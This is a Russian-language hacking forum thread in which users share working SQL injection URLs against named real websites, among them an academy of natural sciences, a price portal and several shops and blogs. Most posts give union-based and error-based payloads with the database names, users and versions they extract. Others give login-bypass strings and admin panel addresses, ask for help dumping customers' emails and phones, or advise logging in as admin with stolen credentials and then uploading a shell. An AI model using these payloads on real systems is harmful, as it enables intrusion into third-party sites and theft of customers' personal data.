Нашел уязвимость через havij: http://www.kinovdom.ru/item.php?id=18537 bd: u0021_kinovdom таблица: orders колонки: name email phone Проблема в том, что в этой огромной бд, достается этим havij 99% всех данных, но конкретно данная таблица, не достается, пишет следующее: Count(*) of u0021_kinovdom.orders is 0 Can not get rows count, trying to get 10 rows Turning off 'bypass illegal union' and retrying! Data Found: name= Turning on 'bypass illegal union' and retrying! Data Found: email= Turning off 'bypass illegal union' and retrying! Data Found: phone= Turning on 'bypass illegal union' and retrying! и так далее... Помогите пожалуйста достать эти данные!
Ищи админку на сайте, потом войти как админ (данные админа вытащи из таблицы logins) Затем ищи phpMyAdmin, ну а там я думаю догадаешься что нужно делать
lex1094 Нормально нужно выкладывать, а не это lexus5122 Правильно пишет, потому что там пусто И главное, для подобных вопросов, тут есть отдельная тема, там и спрашивайте
Логинс, вытащил, а админка не ищется кроме как: http://www.kinovdom.ru:2082/ соответственно по этому пассу не входит ) Мне главное слить даже если без имен и телефонов, хоть емейлы а как же там может быть пусто... должны же где то храниться заказы\емейлы заказчиков...
Host = www.rae.ru Российская Академия Естесствознания PR = 5 TYC = 1500 Inject Code: _ttp://www.rae.ru/fs/?section=content&op=show_article&article_id=7789203+and+1=2+union+select+1,2,3,4,5,null,7,null,9,10,11,12,null,null,null,16,17,18,19,20,21,22,23,24,25,26,null,28,29,null,31,version(),33 Info VERSION = 5.5.24-log USER = sup78user@localhost DATABASE = fs BASES: Code: information_schema account apsc atmail club demo econf es1 express famd famous forum forum10 forum11 forum12 fs horde med monogra mysql online performance_schema phpmyadmin_gAAfZmC2ngnA psa rae research rus-sci science se shop sitebuilder5 social vak who Во все БД есть доступы и они от этих сайтов 1) www.rae.ru PR=5 TYC=1500 2) 15.rae.ru PR=4 TYC=0 3) express.rae.ru PR=3 TYC=0 4) gerb.rae.ru PR=4 TYC=0 5) online.rae.ru PR=3 TYC=20 6) russian-scientists.ru PR=4 TYC=30 7) science-education.ru PR=5 TYC=180 8) www.es.rae.ru PR=4 TYC=20 9) www.famous-scientists.ru PR=5 TYC=1400 10) www.monographies.ru PR=4 TYC=30 11) www.russian-scientists.ru PR=4 TYC=30 ByPass authentication SQL-Injection: 1) _ttp://online.rae.ru/login/auth/ Login = ' or 1='1 Password = ' or 1='1 2) _ttp://www.famous-scientists.ru/login/auth/ Login = admin' or 1='1 Pass = admin' or 1='1 Ну и последняя плюшка... Админка от 1C Bitrix. Вдруг пасс расшифруете, я не смог =( _ttp://russian-scientists.ru:8888/bitrix/admin/ З.Ы. Если зальёте шелл - напомните мне в ПМ, что я неудачник =)
saveoursound Корова Code: http://www.korova.ru/humor/viewer.php?id=-32 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8 --
MySQL: GET SQLi in param 'id' in URL:http://orgasmof.ru Code: http://orgasmof.ru/?id=1%27%20AND%20%28SELECT%203101%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6473763a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28user%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a6d68743a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27YQPM%27=%27YQPM user(): orgasm@localhost version(): 5.1.49-3
Философский портал. Code: http://arcto.ru/modules.php?name=News&file=print&sid=1-1.1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),2,3,4,5,6-- Database Version: 5.1.63 Database name: arctogaia User name: [email protected] ТИЦ: 325 PR: 5
Товары почтой. Code: http://zacaz.com/products.php?news_id=1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())-- Вывод в meta. Database Version: 5.1.63-log Database name: torgpost_db User name: [email protected] ТИЦ: 30 PR: 3 Блого-хостинг. Code: http://www.yesblog.ru/blog.php?user=onlinepburriigri¬e=1-1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8,9-- Вывод в title. Database Version: 5.0.92 Database name: blogsua_yesblog User name: blogsua_yesblog@localhost ТИЦ: 40 PR: 2
Ранее я уже публиковал скулю на private, однако админы это дело отремонтировали, но на место старой приходит две новые...
Газета о жилом и коммерческом фонде. Code: http://www.konserg.ru/index.php?category_id=1+UNION+SELECT+1,2,3,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),5,6,7,8,9,10,11,12,13,14,15,16,17-- information_schema не вывести т.к. хостер - sweb.ru фильтрует запросы и редиректит на sweb.ru/insecure Database Version: 5.1.58-log Database name: konsergru_kon User name: konsergru_kon@localhost ТИЦ: 180 PR: 4
ТМ FreeMarket.ua FreeMarket.ua - цены на компьютеры, мобильные телефоны, бытовую технику, недвижимость, автомобили и многое другое. Яндекс тИЦ (CY): 2500 Google PageRank (PR): 6 Alexa Rank: 48,503 MySQL, Error-Based Duplicate entry SQLi Code: http://freemarket.ua/today.xml?page=1'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/passwd/**/from/**/t_user/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1 5.0.92-log [email protected] + раскрытие путей: Code: /var/www/freesell/data/www/freemarket.kiev.ua/inc/freemarket.inc.php шелл не лил
С болью на сердце и злобой на сисадминов выкладываю эти скули. Работал в сотрудничащей фирме, позвонил им в 2010 году и сообщил про уязвимости в движке, буквально ткнул носом. Сказали, да-да, всё исправим... Two years later... А воз и ныне там... Сайт web-gorod.net Code: _ttp://web-gorod.net/index.php?id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x 5.5.3-55 DB = pzdobnin_wg Таблица с админами = userlist Сайт web-gorod-brn.ru Code: _ttp://web-gorod-brn.ru/view_post.php?cat=16&id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x 5.1.50-lk-log DB = webgorodru Таблица с админами = userlist На главном сайте ещё куча всяких городов... Разбирайте. Пассы в plain-text